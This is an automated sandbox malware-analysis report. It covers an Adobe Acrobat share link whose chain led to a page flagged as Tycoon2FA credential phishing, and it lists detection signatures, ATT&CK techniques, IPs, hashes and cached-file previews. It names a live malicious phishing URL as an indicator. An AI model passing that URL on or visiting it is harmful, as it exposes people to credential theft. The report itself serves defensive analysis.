Edit tour

Windows Analysis Report
https://acrobat.adobe.com/id/urn:aaid:sc:EU:cef22cee-e97f-4efd-9256-9a2eaeaf8ce5

Overview

General Information

Sample URL:https://acrobat.adobe.com/id/urn:aaid:sc:EU:cef22cee-e97f-4efd-9256-9a2eaeaf8ce5
Analysis ID:1641890
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:92
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
Drops files with a non-matching file extension (content does not match file extension)
HTML page contains hidden javascript code
Program does not show much activity (idle)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 5012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1900,i,384991949693676811,3200866675304144503,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1932 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6192 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://acrobat.adobe.com/id/urn:aaid:sc:EU:cef22cee-e97f-4efd-9256-9a2eaeaf8ce5" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_501JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    1.181.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
      1.181.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
        1.179.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
          1.179.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
            1.187..script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
              Click to see the 6 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://0q.onirique5.com/xRmONkR9H3tSwgZ6bakdPQM/)Avira URL Cloud: Label: malware
              Source: chromecache_447.1.drBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_b2c533e1-4

              Phishing

              barindex
              Source: Yara matchFile source: dropped/chromecache_501, type: DROPPED
              Source: Yara matchFile source: 1.179.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.2.pages.csv, type: HTML
              Source: Yara matchFile source: 1.4.pages.csv, type: HTML
              Source: Yara matchFile source: 1.179.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.2.pages.csv, type: HTML
              Source: Yara matchFile source: 1.4.pages.csv, type: HTML
              Source: Yara matchFile source: 1.181.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.187..script.csv, type: HTML
              Source: Yara matchFile source: 1.2.pages.csv, type: HTML
              Source: Yara matchFile source: 1.4.pages.csv, type: HTML
              Source: 1.180..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://0q.onirique5.com/xRmONkR9H3tSwgZ6bakdPQM/... The script uses obfuscated code and URLs, dynamic code execution with eval, and interacts with a suspicious domain (0q.onirique5.com). These behaviors indicate a high risk of malicious intent.
              Source: 1.179.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... The script uses dynamic code execution via eval, which is a high-risk indicator. It also employs obfuscated code, another high-risk indicator. These behaviors suggest potential malicious intent, especially given the lack of transparency and the use of obfuscation.
              Source: https://0q.onirique5.com/xRmONkR9H3tSwgZ6bakdPQM/HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>AI UI Template</title> <style> body { font-family: 'Segoe UI', Tahoma, Geneva,...
              Source: https://acrobat.adobe.com/id/urn:aaid:sc:EU:cef22cee-e97f-4efd-9256-9a2eaeaf8ce5HTTP Parser: No favicon
              Source: chrome.exeMemory has grown: Private usage: 1MB later: 52MB
              Source: chromecache_447.1.dr, chromecache_505.1.dr, chromecache_350.1.dr, chromecache_484.1.dr, chromecache_375.1.drString found in binary or memory: http://iso.org/pdf/ssn
              Source: chromecache_447.1.dr, chromecache_505.1.dr, chromecache_350.1.dr, chromecache_484.1.dr, chromecache_375.1.drString found in binary or memory: http://iso.org/pdf2/ssn
              Source: chromecache_515.1.drString found in binary or memory: http://typekit.com/eulas/0000000000000000000176ff
              Source: chromecache_515.1.drString found in binary or memory: http://typekit.com/eulas/000000000000000000017701
              Source: chromecache_515.1.drString found in binary or memory: http://typekit.com/eulas/000000000000000000017702
              Source: chromecache_515.1.drString found in binary or memory: http://typekit.com/eulas/000000000000000000017703
              Source: chromecache_515.1.drString found in binary or memory: http://typekit.com/eulas/000000000000000000017704
              Source: chromecache_515.1.drString found in binary or memory: http://typekit.com/eulas/000000000000000000017706
              Source: chromecache_446.1.dr, chromecache_486.1.drString found in binary or memory: https://0q.onirique5.com/xRmONkR9H3tSwgZ6bakdPQM/)
              Source: chromecache_540.1.drString found in binary or memory: https://adobereview.uservoice.com/forums/598411-document-review
              Source: chromecache_316.1.drString found in binary or memory: https://assets.adobedtm.com/d4d114c60e50/a0e989131fd5/launch-5dd5dd2177e6.js
              Source: chromecache_540.1.drString found in binary or memory: https://download.adobeprerelease.com/public/resource/1482219688/PreReleaseAgmt%20License-en_US-20160
              Source: chromecache_515.1.drString found in binary or memory: https://p.typekit.net/p.gif
              Source: chromecache_385.1.dr, chromecache_412.1.dr, chromecache_308.1.dr, chromecache_493.1.dr, chromecache_344.1.dr, chromecache_342.1.drString found in binary or memory: https://prod.adobeccstatic.com/License/LICENSE.txt
              Source: chromecache_515.1.drString found in binary or memory: https://use.typekit.net/af/40207f/0000000000000000000176ff/27/
              Source: chromecache_515.1.drString found in binary or memory: https://use.typekit.net/af/4b3e87/000000000000000000017706/27/
              Source: chromecache_515.1.drString found in binary or memory: https://use.typekit.net/af/74ffb1/000000000000000000017702/27/
              Source: chromecache_515.1.drString found in binary or memory: https://use.typekit.net/af/a2527e/000000000000000000017704/27/
              Source: chromecache_515.1.drString found in binary or memory: https://use.typekit.net/af/cb695f/000000000000000000017701/27/
              Source: chromecache_515.1.drString found in binary or memory: https://use.typekit.net/af/eaf09c/000000000000000000017703/27/
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir5012_357688524Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir5012_357688524Jump to behavior
              Source: classification engineClassification label: mal92.phis.evad.win@22/454@0/24
              Source: chromecache_486.1.drInitial sample: https://0q.onirique5.com/xrmonkr9h3tswgz6bakdpqm/
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1900,i,384991949693676811,3200866675304144503,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1932 /prefetch:3
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://acrobat.adobe.com/id/urn:aaid:sc:EU:cef22cee-e97f-4efd-9256-9a2eaeaf8ce5"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1900,i,384991949693676811,3200866675304144503,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1932 /prefetch:3Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 446Jump to dropped file
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 486
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 486Jump to dropped file

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 1.181.d.script.csv, type: HTML
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Spearphishing Link
              Windows Management Instrumentation1
              Browser Extensions
              1
              Process Injection
              2
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote Services1
              Archive Collected Data
              Data ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Extra Window Memory Injection
              1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              File Deletion
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Extra Window Memory Injection
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1641890 URL: https://acrobat.adobe.com/i... Startdate: 18/03/2025 Architecture: WINDOWS Score: 92 19 Antivirus detection for URL or domain 2->19 21 Yara detected AntiDebug via timestamp check 2->21 23 Yara detected Tycoon 2FA PaaS 2->23 25 4 other signatures 2->25 6 chrome.exe 2 2->6         started        8 chrome.exe 2->8         started        process3 process4 10 chrome.exe 6->10         started        dnsIp5 13 66.235.152.156 OMNITUREUS United States 10->13 15 142.250.184.228 GOOGLEUS United States 10->15 17 22 other IPs or domains 10->17

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://acrobat.adobe.com/id/urn:aaid:sc:EU:cef22cee-e97f-4efd-9256-9a2eaeaf8ce50%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://0q.onirique5.com/xRmONkR9H3tSwgZ6bakdPQM/)100%Avira URL Cloudmalware
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              https://0q.onirique5.com/xRmONkR9H3tSwgZ6bakdPQM/true
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://typekit.com/eulas/000000000000000000017704chromecache_515.1.drfalse
                  high
                  http://typekit.com/eulas/000000000000000000017706chromecache_515.1.drfalse
                    high
                    https://0q.onirique5.com/xRmONkR9H3tSwgZ6bakdPQM/)chromecache_446.1.dr, chromecache_486.1.drfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://p.typekit.net/p.gifchromecache_515.1.drfalse
                      high
                      http://typekit.com/eulas/0000000000000000000176ffchromecache_515.1.drfalse
                        high
                        https://download.adobeprerelease.com/public/resource/1482219688/PreReleaseAgmt%20License-en_US-20160chromecache_540.1.drfalse
                          high
                          https://use.typekit.net/af/eaf09c/000000000000000000017703/27/chromecache_515.1.drfalse
                            high
                            http://typekit.com/eulas/000000000000000000017701chromecache_515.1.drfalse
                              high
                              https://prod.adobeccstatic.com/License/LICENSE.txtchromecache_385.1.dr, chromecache_412.1.dr, chromecache_308.1.dr, chromecache_493.1.dr, chromecache_344.1.dr, chromecache_342.1.drfalse
                                high
                                http://typekit.com/eulas/000000000000000000017702chromecache_515.1.drfalse
                                  high
                                  http://typekit.com/eulas/000000000000000000017703chromecache_515.1.drfalse
                                    high
                                    https://use.typekit.net/af/40207f/0000000000000000000176ff/27/chromecache_515.1.drfalse
                                      high
                                      https://assets.adobedtm.com/d4d114c60e50/a0e989131fd5/launch-5dd5dd2177e6.jschromecache_316.1.drfalse
                                        high
                                        https://use.typekit.net/af/a2527e/000000000000000000017704/27/chromecache_515.1.drfalse
                                          high
                                          https://adobereview.uservoice.com/forums/598411-document-reviewchromecache_540.1.drfalse
                                            high
                                            http://iso.org/pdf2/ssnchromecache_447.1.dr, chromecache_505.1.dr, chromecache_350.1.dr, chromecache_484.1.dr, chromecache_375.1.drfalse
                                              high
                                              https://use.typekit.net/af/74ffb1/000000000000000000017702/27/chromecache_515.1.drfalse
                                                high
                                                https://use.typekit.net/af/4b3e87/000000000000000000017706/27/chromecache_515.1.drfalse
                                                  high
                                                  http://iso.org/pdf/ssnchromecache_447.1.dr, chromecache_505.1.dr, chromecache_350.1.dr, chromecache_484.1.dr, chromecache_375.1.drfalse
                                                    high
                                                    https://use.typekit.net/af/cb695f/000000000000000000017701/27/chromecache_515.1.drfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      3.161.82.76
                                                      unknownUnited States
                                                      16509AMAZON-02USfalse
                                                      151.101.1.138
                                                      unknownUnited States
                                                      54113FASTLYUSfalse
                                                      3.161.82.127
                                                      unknownUnited States
                                                      16509AMAZON-02USfalse
                                                      151.101.130.137
                                                      unknownUnited States
                                                      54113FASTLYUSfalse
                                                      2.19.105.89
                                                      unknownEuropean Union
                                                      16625AKAMAI-ASUSfalse
                                                      142.250.184.228
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      104.16.2.189
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      88.221.110.26
                                                      unknownEuropean Union
                                                      20940AKAMAI-ASN1EUfalse
                                                      1.1.1.1
                                                      unknownAustralia
                                                      13335CLOUDFLARENETUSfalse
                                                      104.18.95.41
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      172.66.0.163
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      66.235.152.156
                                                      unknownUnited States
                                                      15224OMNITUREUSfalse
                                                      104.21.82.118
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      3.236.206.93
                                                      unknownUnited States
                                                      14618AMAZON-AESUSfalse
                                                      104.18.20.58
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      2.16.100.96
                                                      unknownEuropean Union
                                                      20940AKAMAI-ASN1EUfalse
                                                      104.16.5.189
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      2.16.100.91
                                                      unknownEuropean Union
                                                      20940AKAMAI-ASN1EUfalse
                                                      104.17.24.14
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      151.101.129.138
                                                      unknownUnited States
                                                      54113FASTLYUSfalse
                                                      104.18.21.58
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      13.35.58.111
                                                      unknownUnited States
                                                      16509AMAZON-02USfalse
                                                      34.120.195.249
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      IP
                                                      127.0.0.1
                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1641890
                                                      Start date and time:2025-03-18 15:20:01 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 4m 21s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:browseurl.jbs
                                                      Sample URL:https://acrobat.adobe.com/id/urn:aaid:sc:EU:cef22cee-e97f-4efd-9256-9a2eaeaf8ce5
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:14
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal92.phis.evad.win@22/454@0/24
                                                      • Exclude process from analysis (whitelisted): sppsvc.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe, TextInputHost.exe
                                                      • Excluded IPs from analysis (whitelisted): 172.217.18.14, 142.250.186.131, 172.217.16.206, 142.251.173.84, 142.250.185.110, 142.250.185.142, 2.19.96.193, 2.19.96.155, 104.124.11.24, 104.124.11.72, 95.101.54.218, 2.16.202.98, 18.213.11.84, 54.224.241.105, 50.16.47.176, 34.237.241.83, 79.125.71.5, 52.213.110.235, 52.48.8.54, 52.31.218.129, 34.252.184.159, 34.199.101.34, 44.198.154.229, 3.217.133.150, 35.169.244.202, 3.232.122.107, 3.209.151.172, 52.70.4.179, 52.87.91.80, 13.32.27.66, 13.32.27.30, 13.32.27.44, 13.32.27.46, 192.168.2.7, 2.19.96.203, 199.232.210.172, 142.250.186.174, 142.250.185.170, 142.250.184.202, 172.217.16.202, 142.250.181.234, 142.250.186.106, 142.250.186.138, 142.250.185.202, 142.250.185.74, 142.250.184.234, 142.250.186.42, 142.250.186.74, 142.250.186.170, 142.250.185.138, 216.58.206.42, 142.250.185.234, 142.250.185.106, 2.22.242.11, 2.22.242.123, 142.250.184.238, 2.19.104.203, 95.101.54.139, 95.101.54.216, 95.101.54.202, 95.101.54.200, 95.101.54.129, 95.101.54.211, 95.101.54.145, 95.101.54.
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                      • VT rate limit hit for: https://acrobat.adobe.com/id/urn:aaid:sc:EU:cef22cee-e97f-4efd-9256-9a2eaeaf8ce5
                                                      No simulations
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (26119)
                                                      Category:downloaded
                                                      Size (bytes):26174
                                                      Entropy (8bit):5.717150390918997
                                                      Encrypted:false
                                                      SSDEEP:768:foXXhU6uNXo/pWZ4xUGoc3R96UI84VcWGYBl9hEa:MQmU7cGU3WGQJ
                                                      MD5:96B54620D709B62F4559E19AF042A5A3
                                                      SHA1:E06B3F6716AC9D7A691F279EF06F6A93128B74CB
                                                      SHA-256:3E99F40B124D9810B03125CD081F8D727A3DF3D7513D92D33979537D27761425
                                                      SHA-512:85B595367E12A120CD2D6D7F98FB377E1570DD6075C7C129B8871748194C9EADD63BA05E0B680FFF75390C16395C99DEEDA9093E03CEC89C04B33FC78751203C
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/verb-outline-chunk.js
                                                      Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[7561],{YgZo:(e,t,n)=>{e.exports=n("EtOT")},PH7B:(e,t,n)=>{"use strict";n.d(t,{g:()=>o});const o=new(n("QKqB").U)},qCTy:(e,t,n)=>{"use strict";n.d(t,{w:()=>unsubscribeFromSelectors,x:()=>subscribeToSelector});var o=n("abd3");let a=[];const unsubscribeFromSelectors=()=>{a.forEach((e=>{e&&"function"==typeof e&&e()})),a=[]},subscribeToSelector=function(e,t,n){let r=arguments.length>3&&void 0!==arguments[3]?arguments[3]:(e,t)=>e!==t;for(var i=arguments.length,l=new Array(i>4?i-4:0),s=4;s<i;s++)l[s-4]=arguments[s];const c=(0,o.computed)((()=>t(e,...l)));let d=c.get(),p=!0;const u=(0,o.autorun)((e=>{const t=c.get();(r(d,t)||p)&&(p=!1,d=t,n(t,e))}));return a.push(u),u}},czs0:(e,t,n)=>{"use strict";n.d(t,{A:()=>p});var o=n("YWiy"),a=n("/hLX"),r=n.n(a),i=n("Ntb/");const CustomIcon=e=>{const t=e.url;return o.createElement(i.Icon,{size:e.size,UNSAFE_classname:e.className},o.createElement(t,{UNSAFE_classname:e.svgClassName}))},l=Cus
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):120951
                                                      Entropy (8bit):5.641642347133425
                                                      Encrypted:false
                                                      SSDEEP:3072:K2vkOpvuvqyvOTv2vN7Bc/4v8C69vpGMs:nvkOpvuvqyvOTv2vN58CL
                                                      MD5:2ADAA9D733C94BD694E4B6454E8EC285
                                                      SHA1:D7D70E2D847CF5907F3B95AD4BBCBE456DA7F555
                                                      SHA-256:4B826F98FA3C21CBDEB7AA6078C7B752CC2418CBEC1AD38D612D905F2485FEF3
                                                      SHA-512:61FB2FF028EA15C4E4917A203E5779A3049D101DC4B9B7CDF7B4C11BB52A456764998F8C2517CE2EE416E8E4876BEDD43BB7C17B5725FD52AF08BD7DEC1FDB25
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/genAIViewer-chunk.js
                                                      Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[8071],{BhaE:(e,t,n)=>{"use strict";t.f=function A4uVisibility(e){var t=_extends({},e);return i.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),i.default.createElement("path",{fillRule:"evenodd",d:"M24.613,8.58A14.972,14.972,0,0,0,18,6.937c-8.664,0-15.75,8.625-15.75,11.423,0,3,7.458,10.7,15.686,10.7,8.3,0,15.814-7.706,15.814-10.7C33.75,16,29.536,11.019,24.613,8.58ZM18,27.225A9.225,9.225,0,1,1,27.225,18,9.225,9.225,0,0,1,18,27.225Z"}),i.default.createElement("path",{fillRule:"evenodd",d:"M20.667,18.083A2.667,2.667,0,0,1,18,15.417a2.632,2.632,0,0,1,1.35-2.27A4.939,4.939,0,0,0,18,12.938,5.063,5.063,0,1,0,23.063,18a4.713,4.713,0,0,0-.175-1.2A2.625,2.625,0,0,1,20.667,18.083Z"}))};var i=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(n("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(va
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (5980)
                                                      Category:downloaded
                                                      Size (bytes):6041
                                                      Entropy (8bit):5.346739699439915
                                                      Encrypted:false
                                                      SSDEEP:96:KbCwoqm7YQwsuHxlAoETQc1cWsH4xNJ5xndBAy+O2+pzhsMWR9vnO8sn9+j9isZN:KbCkmAhlAoE7RM4xNnxnFEgFMR9vnO8J
                                                      MD5:3D72923A7F0AEB76744A468980317657
                                                      SHA1:9C34FF8FDBCCE39FE5A3527291C1C1DBCC92751C
                                                      SHA-256:9EC56AAF18F7A7213D288BA923D9B8D1A237483F9E766B81AE7FF95B293FFF6F
                                                      SHA-512:CFA6E4A47B55BAEC43CDBED13BF940FCCFE26DBA145D57FF6CC8F4C5BC7B8595419C192FD7BDB07989FCAA005793268926B6C23CA6299561C29ED0650E7B1575
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/source-attribution-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[4804],{Nuxp:(t,e,n)=>{n.r(e),n.d(e,{default:()=>components_SourceAttribution});var o=n("YWiy");const invertMatrix=t=>{const[e,n,o,r,a,s]=t,l=e*r-n*o;if(0===l)throw new Error("Matrix is not invertible");return[r/l,-n/l,-o/l,e/l,(o*s-r*a)/l,(n*a-e*s)/l]},multiplyTransformMatrices=(t,e)=>{const[n,o,r,a,s,l]=t,[i,u,c,h,f,m]=e;return[n*i+o*c,n*u+o*h,r*i+a*c,r*u+a*h,s*i+l*c+f,s*u+l*h+m]},getRectFromQuad=t=>{const[e,n,o,r,a,s,l,i]=t;return[[Math.min(e,o,a,l),Math.min(n,r,s,i)],[Math.max(e,o,a,l),Math.max(n,r,s,i)]]},mergeQuads=async(t,e,n)=>{if(!e||0===e.length)return{};let o={},a=!1,s=3;if(6===(null==n?void 0:n.length)){const e=await(async(t,e)=>{const n=await(null==t?void 0:t()),o=n.height,r=n.width;return[{x:0,y:0},{x:r,y:0},{x:r,y:o},{x:0,y:o}].map((t=>{let{x:n,y:o}=t;return{x:e[0]*n+e[2]*o+e[4],y:e[1]*n+e[3]*o+e[5]}}))})(t,n);o={transformedPageQuads:e,transformationMatrix:invertMatrix(n)},s=6,a=!0}const l=awa
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (19800)
                                                      Category:downloaded
                                                      Size (bytes):19915
                                                      Entropy (8bit):5.423171833865133
                                                      Encrypted:false
                                                      SSDEEP:192:JhA7Zcyf7xmJRcLvZJJT3l3jx6K6KrF6FFkmpfky0c/DHFhA7Zcyf7xmJRcLvZJh:Jhjx//RhvpK
                                                      MD5:7EFC35D6333E781945B9F99032D05D6C
                                                      SHA1:AED9FF0060687861AD2A39424B47FC13AE0CAC33
                                                      SHA-256:429F1E791CC88C6B8B9C28ED8E675E1201B48EC50A0FAC4455007E4CB102A95F
                                                      SHA-512:B75C94B51DEF7AEB7DF477E157DC6A2080311ACAAD3E00D287B9E51A812A70142F5A3C62B10CC2E8EC0F25152C82A278C207CBBC24D98958876566EFF7ADEDCD
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/2345-chunk.js
